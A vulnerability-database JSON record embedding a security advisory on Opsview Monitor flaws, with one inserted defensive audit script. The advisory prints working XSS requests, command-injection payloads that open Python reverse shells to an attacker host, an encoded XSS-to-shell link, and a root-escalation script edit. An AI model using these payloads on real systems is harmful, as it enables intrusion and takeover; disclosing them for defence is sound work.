"id": "CNNVD-201809-156"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:02.937000",
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"date": "2018-11-13T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"date": "2018-11-13T14:53:36.727000",
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"date": "2018-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
],
"trust": 0.7
}
}
VAR-201809-0902
Vulnerability from variot - Updated: 2023-12-18 12:01
The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter. Opsview Monitor contains a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Opsview Monitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. Opsview Monitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as the nagios user. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues:
. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could be abused to execute malicious JavaScript code in the context of a legitimate user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.
7.1. Reflected Cross-Site Scripting in Diagnostics
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest' endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
/----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=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%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/
7.2. Persistent Cross-Site Scripting in Settings endpoint
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router' endpoint is vulnerable to Cross-Site Scripting. The following proof of concept demonstrates the vulnerability:
/----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point out that this XSS is self-stored and is executed only in the context of the victim's session. However, this vulnerability can be exploited by an attacker to gain persistence and execute the malicious code each time the victim accesses the settings section.
Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3. Notification abuse leading to remote command execution
[CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 376
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
Connection: close

{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"}
-----/

/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This token could be obtained by a Cross-Site Scripting attack from a specific endpoint (/settings).
. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 434
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=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%3D%3D
Connection: close

ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/
7.5. Script modification could allow local privilege escalation
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges, and the scripts that run at boot time impersonate the nagios user during their execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/-----
/etc/init.d/opsview-reporting-module:

/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
    echo "Attempted to start jasperserver but MySQL credentials are wrong."
    exit 0
fi

DAEMON=/opt/opsview/jasper/bin/rc.jasperserver

test -x $DAEMON || exit 0

# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
    su - opsview -c "$DAEMON $@"
else
    exec $DAEMON $@
fi
-----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/-----
while [ "x$1" != "x" ] ; do
    case "$1" in
        db_export)
            db_export
            ;;
        db_export_test)
            db_export_test
            ;;
        db_export_initial)
            TEST=1
            db_backup
            ;;
        db_import)
            db_import
            ;;
        db_install)
            db_install
            ;;
        db_backup)
            db_backup
            ;;
        db_restore)
            db_restore
            ;;
        db_exists)
            python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
            db_exists
            exit $?
            ;;
        db_upgrade)
            db_upgrade
            exit $?
            ;;
        *)
            die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}"
            ;;
    esac
    shift
done
-----/
/-----
$nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 45566)
# id
uid=0(root) gid=0(root) groups=0(root)
-----/
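A defensive check for the condition described in 7.5, as an added example that is not part of the Core Security advisory or of Opsview's code: it lists the absolute paths an init script runs directly and reports any that a non-root account can modify. The path-extraction heuristic, the `sample_stat` table and the opsview uid of 999 are assumptions made for the illustration; only the file mode and the opsview gid come from the listing quoted in the advisory.

```python
import os
import re
import stat
from collections import namedtuple

# Init-script excerpt quoted in section 7.5 of the advisory.
INIT_SCRIPT = r'''
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
    echo "Attempted to start jasperserver but MySQL credentials are wrong."
    exit 0
fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
    su - opsview -c "$DAEMON $@"
else
    exec $DAEMON $@
fi
'''

SEPARATORS = re.compile(r"\|\||&&|[;|&]")
SKIPPED_WORDS = {"if", "then", "else", "elif", "do", "exec", ".", "source", "!"}
ASSIGNMENT = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(/\S*)$")


def commands_run_directly(script_text):
    """Return absolute paths found in command position, in order of appearance.

    Heuristic (an assumption of this example, not a shell parser): split each
    line on command separators, skip keywords, resolve simple NAME=/path
    variables. Branches are not evaluated, so a path reached only on a
    non-root branch is still listed. Commands wrapped in `su` are not listed,
    because they run after the privilege drop.
    """
    variables, found = {}, []
    for line in script_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for segment in SEPARATORS.split(line):
            words = segment.split()
            while words and words[0] in SKIPPED_WORDS:
                words.pop(0)
            if not words:
                continue
            first = words[0]
            assignment = ASSIGNMENT.match(first)
            if assignment:
                variables[assignment.group(1)] = assignment.group(2)
                continue
            if first.startswith("$"):
                first = variables.get(first[1:].strip("{}"), first)
            if first.startswith("/") and first not in found:
                found.append(first)
    return found


def writable_by_non_root(st):
    """Reasons why an account other than root can modify this file or directory."""
    reasons = []
    if st.st_uid != 0:
        reasons.append("owner uid %d is not root" % st.st_uid)
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("group-writable by gid %d" % st.st_gid)
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit(script_text, stat_fn=os.stat):
    """Map each directly run path to the (path, reasons) findings for it and its parents."""
    findings = {}
    for cmd in commands_run_directly(script_text):
        path = cmd
        while True:
            try:
                reasons = writable_by_non_root(stat_fn(path))
            except OSError:
                reasons = []  # path absent on this host: nothing to report for it
            if reasons:
                findings.setdefault(cmd, []).append((path, reasons))
            parent = os.path.dirname(path)
            if parent == path:
                break
            path = parent
    return findings


# Constructed metadata standing in for os.stat(). db_jasper mirrors the quoted
# listing (-rwxrwxr-x opsview opsview, gid 999); uid 999 and the rest are assumed.
FakeStat = namedtuple("FakeStat", "st_mode st_uid st_gid")
SAMPLE_METADATA = {d: FakeStat(0o040755, 0, 0) for d in (
    "/", "/opt", "/opt/opsview", "/opt/opsview/jasper", "/opt/opsview/jasper/bin")}
SAMPLE_METADATA["/opt/opsview/jasper/bin/db_jasper"] = FakeStat(0o100775, 999, 999)
SAMPLE_METADATA["/opt/opsview/jasper/bin/rc.jasperserver"] = FakeStat(0o100755, 0, 0)


def sample_stat(path):
    if path not in SAMPLE_METADATA:
        raise FileNotFoundError(path)
    return SAMPLE_METADATA[path]


if __name__ == "__main__":
    for cmd, hits in audit(INIT_SCRIPT, sample_stat).items():
        for path, reasons in hits:
            print("%s: %s (%s)" % (cmd, path, "; ".join(reasons)))
```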
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send the draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed that an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that they were planning to release a fix for these versions by the end of July.
2018-05-11: Core Security thanked Opsview for the confirmation.
2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked Opsview for the status update and asked for a tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the end of August, when they release the fixes for its earlier versions.
2018-07-18: Core Security agreed with Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining fixes.
2018-08-13: Opsview replied saying that they were targeting the week of August 24th to release the fixes for their earlier product versions and they would confirm the exact date at the end of the next week.
2018-08-13: Core Security thanked Opsview for the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th.
2018-08-24: Core Security thanked Opsview for the update and proposed September 4th as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0902",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.3.1"
},
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.0"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.3"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.1"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
